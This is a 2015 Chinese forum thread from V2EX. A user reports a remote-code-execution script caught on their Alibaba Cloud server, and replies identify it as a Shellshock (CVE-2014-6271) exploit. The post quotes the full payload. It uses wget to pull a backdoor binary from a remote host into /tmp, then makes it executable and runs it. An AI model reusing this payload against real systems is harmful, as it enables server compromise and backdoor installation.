V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Recommended Services
Amazon Web Services
LeanCloud
New Relic
ClearDB
ngloom
V2EX  ›  云计算

阿里云的 EC2 经常拦截到一些远程代码执行的脚本

  •  
  •   ngloom · 2015-08-11 08:20:30 +08:00 · 5372 次点击
    这是一个创建于 3379 天前的主题,其中的信息可能已经有所发展或是发生改变。

    类似下面这样:

    Match1:{ :; }; /bin/bash -c .rm -rf /tmp/*;echo wget http://houmen.linux22.cn:123/houmen/linux223 -o /tmp/china.z-axjx. >> /tmp/run.sh;echo echo by china.z >> /tmp/run.sh;echo chmod 777 /tmp/china.z-axjx. >> /tmp/run.sh;echo /tmp/china.z-axjx. >> /tmp/run.sh;echo rm -rf /tmp/run.sh >> /tmp/run.sh;chmod 777 /tmp/run.sh;/tmp/run.sh.
    

    今天发现有几个脚本来自IP:182.254.217.63,百度了一下

    IP地址: 182.254.217.63上海市 腾讯集团

    忽然觉得有点背后凉凉的,大鹅厂还有这种业务?

    不过这个脚本一直没有下载成功过,不知道里面是干啥的, 有研究过的V友么?

    9 条回复    2015-08-11 17:24:52 +08:00
    wy315700
        1
    wy315700  
       2015-08-11 08:41:25 +08:00
    腾讯云的吧
    belin520
        2
    belin520  
       2015-08-11 08:54:14 +08:00 via Android
    没卵用,整个ip段扫描的吧,我的静态博客也有这
    manhere
        3
    manhere  
       2015-08-11 09:01:42 +08:00 via iPhone   ❤️ 1
    腾讯云上面的色情站不要太多,,,
    使用腾讯云的话QQ还给域名绿盾认证
    垃圾站首选
    kenX
        4
    kenX  
       2015-08-11 09:46:29 +08:00
    这是CVE-2014-6271的exp
    mcone
        5
    mcone  
       2015-08-11 09:49:44 +08:00
    人家都给你拼写的这么明确了 “houmen”,你还问这脚本是干啥的…………

    另外腾讯云确实是我见到的出点名的最不讲究的,各种垃圾伪原创站、钓鱼站、色情站……目测还有不少肉鸡
    dream7758521
        6
    dream7758521  
       2015-08-11 10:33:38 +08:00 via Android
    后背凉,肾虚。
    bydmm
        7
    bydmm  
       2015-08-11 11:03:33 +08:00
    paw
        8
    paw  
       2015-08-11 17:06:59 +08:00
    houmen ..... 我擦 以为是啥英语单词呢
    放到词典里,,,,后门。,。 我擦
    vmskipper
        9
    vmskipper  
       2015-08-11 17:24:52 +08:00
    看到域名 犹如一股寒芒戳菊
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2658 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 31ms · UTC 03:07 · PVG 11:07 · LAX 19:07 · JFK 22:07
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.